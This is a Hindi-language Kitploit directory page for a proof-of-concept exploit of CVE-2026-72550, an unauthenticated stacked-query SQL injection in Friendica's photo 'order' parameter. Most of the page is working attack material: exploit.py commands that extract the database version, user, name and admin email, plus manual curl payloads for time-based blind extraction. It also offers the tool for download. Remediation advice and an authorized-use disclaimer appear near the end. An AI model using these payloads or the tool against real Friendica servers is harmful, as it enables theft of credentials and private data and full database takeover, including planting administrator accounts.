Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/abdugafforov-bobur/cve-2026-72550-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubabdugafforov-bobur/cve-2026-72550-poc

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-72550-poc

CVE-2026-72550 — Friendica अनप्रमाणित स्टैक्ड-क्वेरी SQL इंजेक्शन PoC (CVSS 9.8 क्रिटिकल)

रिपॉजिटरी देखें
6 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-72550 — Friendica बिना प्रमाणीकरण SQL इंजेक्शन

Friendica के फोटो एंडपॉइंट में बिना प्रमाणीकरण वाला स्टैक्ड-क्वेरी SQL इंजेक्शन किसी भी विज़िटर को मनमाना SQL चलाने की अनुमति देता है।

फ़ील्डमान
CVE IDCVE-2026-72550
उत्पादFriendica (स्व-होस्टेड संघीय सोशल नेटवर्क)
प्रभावित<= 2026.08-dev (git HEAD e3fc1bc)
प्रकारCWE-89: SQL इंजेक्शन (बिना प्रमाणीकरण, स्टैक्ड क्वेरी)
गंभीरतागंभीर — CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
प्रमाणीकरण आवश्यककोई नहीं

सारांश

Friendica में फोटो-व्यू एंडपॉइंट order क्वेरी पैरामीटर को लेता है और उसे बिना एस्केप किए SHOW COLUMNS ... LIKE '...' स्टेटमेंट में जोड़ता है, जिसे बिना किसी आवरण के PDO::query() के माध्यम से चलाया जाता है — जो कई स्टेटमेंट की अनुमति देता है। किसी लॉगिन की आवश्यकता नहीं है, और एक सामान्य इंस्टॉल पर (block_public डिफ़ॉल्ट रूप से बंद है) कोई भी सार्वजनिक रूप से दिखने वाला फोटो पर्याप्त है। चूंकि PDO::query() स्टैक्ड स्टेटमेंट को निष्पादित करता है, एक अनाम हमलावर केवल डेटा नहीं पढ़ता — वे मनमाना SQL चलाते हैं, जिसमें एडमिन उपयोगकर्ता बनाने के लिए INSERT/UPDATE शामिल है।

संवेदनशील कोड पथ

root@kitploit:~
mod/photos.php:673              — reads raw $_GET['order']
DBStructure::existsColumn()     — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
  src/Database/DBStructure.php:714
DBA::p() → PDO::query()         — executes with stacked statements enabled

डिफ़ॉल्ट अनुरोध पथ इस कोड तक पहुँचता है: $cmd डिफ़ॉल्ट रूप से 'view' होता है ($cmd === 'view' शर्त को पूरा करता है) और no_count बंद होता है, इसलिए न तो प्रमाणीकरण की आवश्यकता होती है और न ही कोई गैर-डिफ़ॉल्ट सेटिंग की।

उपयोग

root@kitploit:~
# Install dependency
pip install requests

# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only

# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version

# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user

# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name

# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email

पैरामीटर

मैन्युअल रिप्रोडक्शन

किसी कुकी या प्रमाणीकरण की आवश्यकता नहीं है। इसे किसी भी सार्वजनिक फोटो resource-id पर इंगित करें:

root@kitploit:~
# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=created"

# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"

डिकोड किया गया पेलोड: x';SELECT SLEEP(5)-- -

इंजेक्ट किया गया SQL इस प्रकार बनता है:

root@kitploit:~
SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'

ब्लाइंड बूलियन एक्सट्रैक्शन

root@kitploit:~
# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"

# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"

प्रभाव

एक बिना प्रमाणीकरण वाला हमलावर निम्न कार्य कर सकता है:

  • पढ़ना डेटाबेस से कोई भी डेटा (क्रेडेंशियल, ईमेल, निजी संदेशों की ब्लाइंड एक्सट्रैक्शन)
  • लिखना मनमानी पंक्तियाँ — जिसमें INSERT INTO user के माध्यम से व्यवस्थापक खाता बनाना शामिल है
  • संशोधित करना मौजूदा डेटा — किसी भी उपयोगकर्ता को एडमिन बनाना, पोस्ट के साथ छेड़छाड़ करना, पासवर्ड रीसेट करना
  • हटाना डेटा या टेबल को ड्रॉप करना (सेवा से वंचित करना)

यह एक पूर्ण डेटाबेस समझौता है जो डिफ़ॉल्ट Friendica इंस्टॉल पर किसी भी अनाम विज़िटर द्वारा प्राप्त किया जा सकता है।

समाधान

  1. उपयोग से पहले order को ज्ञात कॉलम व्हाइटलिस्ट के विरुद्ध मान्य करें
  2. SHOW COLUMNS में स्ट्रिंग कॉन्कटेनेशन के बजाय पैरामीटरयुक्त क्वेरी का उपयोग करें
  3. PDO कनेक्शन पर मल्टी-स्टेटमेंट निष्पादन अक्षम करें (PDO::ATTR_EMULATE_PREPARES => false)

समयरेखा

दिनांकघटना
2026-07-07स्थानीय इंस्टेंस पर भेद्यता खोजी गई और पुष्टि की गई
2026-08-11CVE-2026-72550 को TuranSec CNA के माध्यम से प्रकाशित किया गया

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन प्रणालियों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेता है।

श्रेय

खोजकर्ता: Bobur Abdugafforov (@abdugafforov-bobur)

CVE को TuranSec CNA के माध्यम से आवंटित किया गया

टूल डाउनलोड करें
फ़्लैगविवरण
-u / --urlलक्ष्य बेस URL (जैसे http://target:8176)
-r / --userवह उपयोगकर्ता नाम जिसकी फोटो गैलरी को हिट करना है
-i / --resource-idकिसी भी सार्वजनिक रूप से दिखने वाले फोटो की रिसोर्स ID
--extractनिकालने के लिए मान: version, db_user, db_name, admin_email
--check-onlyकेवल भेद्यता का परीक्षण करें, डेटा न निकालें
--sleepSLEEP देरी सेकंड में (डिफ़ॉल्ट: 5)